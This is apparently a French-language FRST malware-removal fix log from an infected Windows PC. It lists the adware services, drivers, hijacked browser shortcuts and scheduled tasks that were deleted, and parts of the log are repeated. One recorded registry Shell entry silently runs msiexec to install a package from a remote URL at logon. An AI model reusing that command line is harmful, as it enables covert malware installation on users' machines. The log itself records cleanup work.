2017-04-26 09:18 - 2017-04-26 09:18 - 00000000 ____D C:\Users\utilisateur\AppData\Roaming\Firefox
2017-04-26 09:18 - 2017-04-26 09:18 - 00000000 ____D C:\Users\utilisateur\AppData\Local\Firefox
2017-04-26 09:18 - 2017-04-26 09:18 - 00000000 ____D C:\Users\utilisateur\AppData\Local\Doeye
2017-04-26 09:18 - 2017-04-26 09:18 - 00000000 ____D C:\ProgramData\Apple
2017-04-26 09:18 - 2017-04-26 09:18 - 00000000 ____D C:\Program Files (x86)\Doeye
2017-04-26 09:18 - 2017-04-26 09:18 - 00000000 _____ C:\WINDOWS\SysWOW64\33
2017-04-26 09:17 - 2017-05-12 16:15 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-04-26 09:17 - 2017-05-12 15:01 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-04-26 09:17 - 2017-05-11 13:20 - 00000000 _____ C:\WINDOWS\SysWOW64\11
2017-04-26 09:17 - 2017-04-26 09:18 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-04-26 09:13 - 2017-05-11 13:19 - 00000000 ____D C:\Program Files (x86)\BiaoJi
2017-04-14 09:11 - 2017-04-14 11:03 - 00000000 ____D C:\Users\utilisateur\Desktop\SMAH
2017-04-13 15:15 - 2017-04-13 15:15 - 00000000 ____D C:\Users\utilisateur\AppData\Roaming\SSMgre
Task: {416E13CC-6EFB-4784-92EC-7698F01AFE44} - System32\Tasks\{A31D07D8-792D-4A70-AA88-0B3A5F6F23E6} => pcalua.exe -a C:\Users\utilisateur\AppData\Roaming\mystartsearch\UninstallManager.exe -c -ptid=slbnew
Task: {C035B091-00AF-4FCD-99EB-52A74E569DC2} - System32\Tasks\{518A85B1-3201-4D19-AE4A-C0E8D47B9811} => pcalua.exe -a C:\Users\utilisateur\AppData\Local\{ACCF9A93-8867-F62B-E5FF-D3C3C1972F5B}\uninst.exe -c -FN="C:\Users\utilisateur\AppData\Local\{AC929A29-89C0-F75F-E2F6-D08D3E242DB3}\SyncTask.exe"-P=/Uninstall /s /noun /DelSelfDir
Task: {C645F8A1-45D3-4EE3-9458-FBC53F0CA902} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
C:\windows\psgo
Shortcut: C:\Users\utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.)
ShortcutWithArgument: C:\Users\utilisateur\Desktop\BigFarm.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064
ShortcutWithArgument: C:\Users\utilisateur\Desktop\big_bang_empire.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005
ShortcutWithArgument: C:\Users\utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493795129&z=f93a22eb370f4c8cd34562dg0z7t5c6mdt5wcg8o6b&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WX51E93YD847YD847
ShortcutWithArgument: C:\Users\utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493795129&z=f93a22eb370f4c8cd34562dg0z7t5c6mdt5wcg8o6b&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WX51E93YD847YD847
ShortcutWithArgument: C:\Users\utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493795129&z=f93a22eb370f4c8cd34562dg0z7t5c6mdt5wcg8o6b&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WX51E93YD847YD847
C:\Program Files (x86)\Doeye
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKU\S-1-5-21-2704358713-113574765-3970069142-1001\Software\Microsoft\Windows\CurrentVersion\Run\\background_fault => valeur supprimé(es) avec succès
HKU\S-1-5-21-2704358713-113574765-3970069142-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => valeur supprimé(es) avec succès
SNARE => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\SNARE => clé supprimé(es) avec succès
SNARE => service supprimé(es) avec succès
iSafeService => service non trouvé(e).
HKLM\System\CurrentControlSet\Services\Kitty => clé supprimé(es) avec succès
Kitty => service supprimé(es) avec succès
2 WinInstallSvc; C:\ProgramData\Microsoft\AppV\Setup\Integrator.dll [105984 2017-05-08] () [Fichier non signé] => Erreur: Pas de correction automatique trouvée pour cet élément.
WinSAPSvc => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\WinSAPSvc => clé supprimé(es) avec succès
WinSAPSvc => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\WsAppService => clé supprimé(es) avec succès
WsAppService => service supprimé(es) avec succès
SNAREA => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\SNAREA => clé supprimé(es) avec succès
SNAREA => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\SSSvc => clé supprimé(es) avec succès
SSSvc => service supprimé(es) avec succès
WANARE => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\WANARE => clé supprimé(es) avec succès
WANARE => service supprimé(es) avec succès
iSafeKrnl => service non trouvé(e).
iSafeKrnlBoot => service non trouvé(e).
iSafeKrnlKit => service non trouvé(e).
HKLM\System\CurrentControlSet\Services\iSafeKrnlMon => clé supprimé(es) avec succès
iSafeKrnlMon => service supprimé(es) avec succès
iSafeKrnlR3 => service non trouvé(e).
iSafeNetFilter => service non trouvé(e).
HKLM\System\CurrentControlSet\Services\mvdM23 => clé supprimé(es) avec succès
mvdM23 => service supprimé(es) avec succès
"C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys 5E07045CEAE146804475434227649883" => non trouvé(e).
"C:\WINDOWS\System32\DRIVERS\iSafeKrnlBoot.sys FAB2EBA07369BF3C6DB33469B5B36FCB" => non trouvé(e).
"C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys 406D4425ECFD7BAAFA0E700F7A2E64FD" => non trouvé(e).
"C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys A22E4FC5E5A801DAAE7978F87059CC9F" => non trouvé(e).
"C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys C7129E801982BC831831D2F6DD6FCE8B" => non trouvé(e).
"C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys 9FB02FBA90F6AF59537A30C3DB9777C8" => non trouvé(e).
C:\Users\utilisateur\Desktop\big_bang_empire.lnk => déplacé(es) avec succès
C:\Users\utilisateur\Desktop\BigFarm.lnk => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\3333333 => déplacé(es) avec succès
C:\WINDOWS\system32\log => déplacé(es) avec succès
"C:\Program Files (x86)\Elex-tech" => non trouvé(e).
C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys => déplacé(es) avec succès
C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Local\NPASRE => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\00 => déplacé(es) avec succès
C:\Users\Public\Desktop\Mozilla Firefox.lnk => déplacé(es) avec succès
"C:\Users\utilisateur\AppData\Roaming\Elex-tech" => non trouvé(e).
C:\Program Files\MK => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\1111 => déplacé(es) avec succès
C:\Users\Public\Documents\temp => déplacé(es) avec succès
C:\Users\Public\Documents\Google => déplacé(es) avec succès
C:\Users\Public\Documents\chrome => déplacé(es) avec succès
C:\Program Files (x86)\Bookness => déplacé(es) avec succès
C:\Users\utilisateur\Desktop\8 mais 2017 => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Local\WANARE => déplacé(es) avec succès
C:\ProgramData\BIT => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Local\background_fault => déplacé(es) avec succès
C:\Program Files (x86)\AlphaGo => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\1 => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\1111111 => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\Windows-PG => déplacé(es) avec succès
C:\WINDOWS\psgo => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Local\SNAREA => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Local\Kitty => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\Milimili => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Roaming\WinSAPSvc => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\data.bin => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Local\SNARE => déplacé(es) avec succès
C:\Program Files (x86)\MIO => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Roaming\Firefox => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Local\Firefox => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Local\Doeye => déplacé(es) avec succès
C:\ProgramData\Apple => déplacé(es) avec succès
C:\Program Files (x86)\Doeye => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\33 => déplacé(es) avec succès
C:\Users\Public\Documents\report.dat => déplacé(es) avec succès
C:\Users\Public\Documents\temp.dat => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\11 => déplacé(es) avec succès
C:\Program Files (x86)\Firefox => déplacé(es) avec succès
C:\Program Files (x86)\BiaoJi => déplacé(es) avec succès
C:\Users\utilisateur\Desktop\SMAH => déplacé(es) avec succès
C:\Users\utilisateur\AppData\Roaming\SSMgre => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{416E13CC-6EFB-4784-92EC-7698F01AFE44} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{416E13CC-6EFB-4784-92EC-7698F01AFE44} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\{A31D07D8-792D-4A70-AA88-0B3A5F6F23E6} => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{A31D07D8-792D-4A70-AA88-0B3A5F6F23E6} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C035B091-00AF-4FCD-99EB-52A74E569DC2} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C035B091-00AF-4FCD-99EB-52A74E569DC2} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\{518A85B1-3201-4D19-AE4A-C0E8D47B9811} => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{518A85B1-3201-4D19-AE4A-C0E8D47B9811} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C645F8A1-45D3-4EE3-9458-FBC53F0CA902} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C645F8A1-45D3-4EE3-9458-FBC53F0CA902} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Windows-PG => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-PG => clé supprimé(es) avec succès
"C:\windows\psgo" => non trouvé(e).
C:\Users\utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => déplacé(es) avec succès
C:\Users\Public\Desktop\Google Chrome.lnk => déplacé(es) avec succès
C:\Users\utilisateur\Desktop\BigFarm.lnk => non trouvé(e).
C:\Users\utilisateur\Desktop\big_bang_empire.lnk => non trouvé(e).
C:\Users\utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk => Raccourci argument supprimé(es) avec succès.
"C:\Program Files (x86)\Doeye" => non trouvé(e).
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2704358713-113574765-3970069142-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2704358713-113574765-3970069142-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 294359 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 289405542 B
Java, Flash, Steam htmlcache => 6625 B
Windows/system/drivers => 342738587 B
Edge => 5023635 B
Chrome => 2695089 B
Firefox => 337777339 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 24275951 B
systemprofile32 => 20536428 B
LocalService => 46492 B
NetworkService => 6166932 B
utilisateur => 2739381046 B
RecycleBin => 1541214811 B
EmptyTemp: => 4.9 GB données temporaires supprimées.
================================
Le système a dû redémarrer.
Exécuté par utilisateur (15-05-2017 11:58:40) Run:1
Exécuté depuis C:\Users\utilisateur\Desktop
Profils chargés: utilisateur (Profils disponibles: utilisateur)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-2704358713-113574765-3970069142-1001\...\Run: [background_fault] => C:\Users\utilisateur\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <===== ATTENTION
HKU\S-1-5-21-2704358713-113574765-3970069142-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj85OTJYFTU5MjIdF8JQMWlXNjlLMdzSFTw4FTU4MkU1Nc%3D%3D /q [Pays US - 104.24.101.133]
R2 SNARE; C:\Users\utilisateur\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [Fichier non sign�] <==== ATTENTION
R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participa��es Ltda)
S4 Kitty; C:\Users\utilisateur\AppData\Local\Kitty\Kitty.dll [124928 2017-05-09] () [Fichier non sign�] <==== ATTENTION
2 WinInstallSvc; C:\ProgramData\Microsoft\AppV\Setup\Integrator.dll [105984 2017-05-08] () [Fichier non sign�]
R2 WinSAPSvc; C:\Users\utilisateur\AppData\Roaming\WinSAPSvc\WinSAP.dll [585216 2017-05-09] (serviec) [Fichier non sign�] <==== ATTENTION
S3 WsAppService; C:\Program Files (x86)\Wondershare\WAF\WsAppService.exe [252816 2015-04-30] (Wondershare)
R2 SNAREA; C:\Users\utilisateur\AppData\Local\SNAREA\Snare.dll [826368 2017-05-03] (InterSect Alliance Pty Ltd) [Fichier non sign�] <==== ATTENTION
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
R2 WANARE; C:\Users\utilisateur\AppData\Local\WANARE\Snare.dll [826368 2017-05-05] (InterSect Alliance Pty Ltd) [Fichier non sign�]
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participa��es Ltda) <==== ATTENTION
S3 iSafeKrnlBoot; C:\WINDOWS\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participa��es Ltda) <==== ATTENTION
S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participa��es Ltda) <==== ATTENTION
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participa��es Ltda) <==== ATTENTION
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participa��es Ltda) <==== ATTENTION
R1 iSafeNetFilter; C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participa��es Ltda) <==== ATTENTION
S3 mvdM23; C:\Users\utilisateur\AppData\Local\Temp\mvdM23.sys [100912 2017-04-07] () <==== ATTENTION
C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys 5E07045CEAE146804475434227649883
C:\WINDOWS\System32\DRIVERS\iSafeKrnlBoot.sys FAB2EBA07369BF3C6DB33469B5B36FCB
C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys 406D4425ECFD7BAAFA0E700F7A2E64FD
C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys A22E4FC5E5A801DAAE7978F87059CC9F
C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys C7129E801982BC831831D2F6DD6FCE8B
C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys 9FB02FBA90F6AF59537A30C3DB9777C8
2017-05-11 13:45 - 2017-05-12 15:01 - 00002066 _____ C:\Users\utilisateur\Desktop\big_bang_empire.lnk
2017-05-11 13:45 - 2017-05-12 15:01 - 00002040 _____ C:\Users\utilisateur\Desktop\BigFarm.lnk
2017-05-11 10:33 - 2017-05-11 13:20 - 00000000 _____ C:\WINDOWS\SysWOW64\3333333
2017-05-11 10:33 - 2017-05-11 10:33 - 00000000 ____D C:\WINDOWS\system32\log
2017-05-11 10:33 - 2017-05-11 10:33 - 00000000 ____D C:\Program Files (x86)\Elex-tech
2017-05-11 10:33 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participa��es Ltda) C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys
2017-05-11 10:33 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participa��es Ltda) C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys
2017-05-11 10:32 - 2017-05-11 13:44 - 00000000 ____D C:\Users\utilisateur\AppData\Local\NPASRE
2017-05-11 10:32 - 2017-05-11 13:20 - 00000000 _____ C:\WINDOWS\SysWOW64\00
2017-05-11 10:32 - 2017-05-11 10:32 - 00002003 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-05-11 10:32 - 2017-05-11 10:32 - 00000000 ____D C:\Users\utilisateur\AppData\Roaming\Elex-tech
2017-05-09 12:42 - 2017-05-12 15:01 - 00000000 ____D C:\Program Files\MK
2017-05-09 12:42 - 2017-05-12 15:01 - 00000000 _____ C:\WINDOWS\SysWOW64\1111
2017-05-09 10:45 - 2017-05-09 10:47 - 00000000 ____D C:\Users\Public\Documents\temp
2017-05-09 10:45 - 2017-05-09 10:45 - 00000000 ____D C:\Users\Public\Documents\Google
2017-05-09 10:45 - 2017-05-09 10:45 - 00000000 ____D C:\Users\Public\Documents\chrome
2017-05-09 10:45 - 2017-05-09 10:45 - 00000000 ____D C:\Program Files (x86)\Bookness
2017-05-08 11:46 - 2017-05-08 11:47 - 00000000 ____D C:\Users\utilisateur\Desktop\8 mais 2017
2017-05-05 12:19 - 2017-05-05 12:19 - 00000000 ____D C:\Users\utilisateur\AppData\Local\WANARE
2017-05-05 12:19 - 2017-05-05 12:19 - 00000000 ____D C:\ProgramData\BIT
2017-05-04 10:59 - 2017-05-12 09:06 - 00000000 ____D C:\Users\utilisateur\AppData\Local\background_fault
2017-05-04 10:59 - 2017-05-09 12:45 - 00000000 ____D C:\Program Files (x86)\AlphaGo
2017-05-04 09:14 - 2017-05-12 09:51 - 00000000 _____ C:\WINDOWS\SysWOW64\1
2017-05-03 14:15 - 2017-05-11 13:20 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111
2017-05-03 14:15 - 2017-05-05 12:20 - 00003578 _____ C:\WINDOWS\System32\Tasks\Windows-PG
2017-05-03 14:15 - 2017-05-03 14:15 - 00000000 ____D C:\WINDOWS\psgo
2017-05-03 14:15 - 2017-05-03 14:15 - 00000000 ____D C:\Users\utilisateur\AppData\Local\SNAREA
2017-05-03 14:15 - 2017-05-03 14:15 - 00000000 ____D C:\Users\utilisateur\AppData\Local\Kitty
2017-05-03 09:05 - 2017-05-12 15:01 - 00003666 _____ C:\WINDOWS\System32\Tasks\Milimili
2017-05-03 09:05 - 2017-05-12 15:01 - 00000000 ____D C:\Users\utilisateur\AppData\Roaming\WinSAPSvc
2017-05-03 09:05 - 2017-05-03 09:05 - 00000376 _____ C:\WINDOWS\SysWOW64\data.bin
2017-05-03 09:05 - 2017-05-03 09:05 - 00000000 ____D C:\Users\utilisateur\AppData\Local\SNARE
2017-05-03 09:05 - 2017-05-03 09:05 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-26 09:18 - 2017-04-26 09:18 - 00000000 ____D C:\Users\utilisateur\AppData\Roaming\Firefox
2017-04-26 09:18 - 2017-04-26 09:18 - 00000000 ____D C:\Users\utilisateur\AppData\Local\Firefox
2017-04-26 09:18 - 2017-04-26 09:18 - 00000000 ____D C:\Users\utilisateur\AppData\Local\Doeye
2017-04-26 09:18 - 2017-04-26 09:18 - 00000000 ____D C:\ProgramData\Apple
2017-04-26 09:18 - 2017-04-26 09:18 - 00000000 ____D C:\Program Files (x86)\Doeye
2017-04-26 09:18 - 2017-04-26 09:18 - 00000000 _____ C:\WINDOWS\SysWOW64\33
2017-04-26 09:17 - 2017-05-12 16:15 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-04-26 09:17 - 2017-05-12 15:01 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-04-26 09:17 - 2017-05-11 13:20 - 00000000 _____ C:\WINDOWS\SysWOW64\11
2017-04-26 09:17 - 2017-04-26 09:18 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-04-26 09:13 - 2017-05-11 13:19 - 00000000 ____D C:\Program Files (x86)\BiaoJi
2017-04-14 09:11 - 2017-04-14 11:03 - 00000000 ____D C:\Users\utilisateur\Desktop\SMAH
2017-04-13 15:15 - 2017-04-13 15:15 - 00000000 ____D C:\Users\utilisateur\AppData\Roaming\SSMgre
Task: {416E13CC-6EFB-4784-92EC-7698F01AFE44} - System32\Tasks\{A31D07D8-792D-4A70-AA88-0B3A5F6F23E6} => pcalua.exe -a C:\Users\utilisateur\AppData\Roaming\mystartsearch\UninstallManager.exe -c -ptid=slbnew
Task: {C035B091-00AF-4FCD-99EB-52A74E569DC2} - System32\Tasks\{518A85B1-3201-4D19-AE4A-C0E8D47B9811} => pcalua.exe -a C:\Users\utilisateur\AppData\Local\{ACCF9A93-8867-F62B-E5FF-D3C3C1972F5B}\uninst.exe -c -FN="C:\Users\utilisateur\AppData\Local\{AC929A29-89C0-F75F-E2F6-D08D3E242DB3}\SyncTask.exe"-P=/Uninstall /s /noun /DelSelfDir
Task: {C645F8A1-45D3-4EE3-9458-FBC53F0CA902} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
C:\windows\psgo
Shortcut: C:\Users\utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.)
ShortcutWithArgument: C:\Users\utilisateur\Desktop\BigFarm.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064
ShortcutWithArgument: C:\Users\utilisateur\Desktop\big_bang_empire.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005
ShortcutWithArgument: C:\Users\utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493795129&z=f93a22eb370f4c8cd34562dg0z7t5c6mdt5wcg8o6b&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WX51E93YD847YD847
ShortcutWithArgument: C:\Users\utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493795129&z=f93a22eb370f4c8cd34562dg0z7t5c6mdt5wcg8o6b&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WX51E93YD847YD847
ShortcutWithArgument: C:\Users\utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493795129&z=f93a22eb370f4c8cd34562dg0z7t5c6mdt5wcg8o6b&from=ypid&uid=WDCXWD10JPVX-22JC3T0_WD-WX51E93YD847YD847
C:\Program Files (x86)\Doeye
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKU\S-1-5-21-2704358713-113574765-3970069142-1001\Software\Microsoft\Windows\CurrentVersion\Run\\background_fault => valeur supprimé(es) avec succès
HKU\S-1-5-21-2704358713-113574765-3970069142-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => valeur supprimé(es) avec succès
SNARE => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\SNARE => clé supprimé(es) avec succès
SNARE => service supprimé(es) avec succès
iSafeService => service non trouvé(e).
HKLM\System\CurrentControlSet\Services\Kitty => clé supprimé(es) avec succès
Kitty => service supprimé(es) avec succès
2 WinInstallSvc; C:\ProgramData\Microsoft\AppV\Setup\Integrator.dll [105984 2017-05-08] () [Fichier non signé] => Erreur: Pas de correction automatique trouvée pour cet élément.
WinSAPSvc => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\WinSAPSvc => clé supprimé(es) avec succès
WinSAPSvc => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\WsAppService => clé supprimé(es) avec succès
WsAppService => service supprimé(es) avec succès
SNAREA => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\SNAREA => clé supprimé(es) avec succès
SNAREA => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\SSSvc => clé supprimé(es) avec succès
SSSvc => service supprimé(es) avec succès
WANARE => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\WANARE => clé supprimé(es) avec succès
WANARE => service supprimé(es) avec succès
iSafeKrnl => service non trouvé(e).
iSafeKrnlBoot => service non trouvé(e).
iSafeKrnlKit => service non trouvé(e).
HKLM\System\CurrentControlSet\Services\iSafeKrnlMon => clé supprimé(es) avec succès
iSafeKrnlMon => service supprimé(es) avec succès
iSafeKrnlR3 => service non trouvé(e).
iSafeNetFilter => service non trouvé(e).
HKLM\System\CurrentControlSet\Services\mvdM23 => clé supprimé(es) avec succès
mvdM23 => service supprimé(es) avec succès
"C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys 5E07045CEAE146804475434227649883" => non trouvé(e).
"C:\WINDOWS\System32\DRIVERS\iSafeKrnlBoot.sys FAB2EBA07369BF3C6DB33469B5B36FCB" => non trouvé(e).
"C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys 406D4425ECFD7BAAFA0E700F7A2E64FD" => non trouvé(e).
"C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys A22E4FC5E5A801DAAE7978F87059CC9F" => non trouvé(e).
"C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys C7129E801982BC831831D2F6DD6FCE8B" => non trouvé(e).
"C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys 9FB02FBA90F6AF59537A30C3DB9777C8" => non trouvé(e).
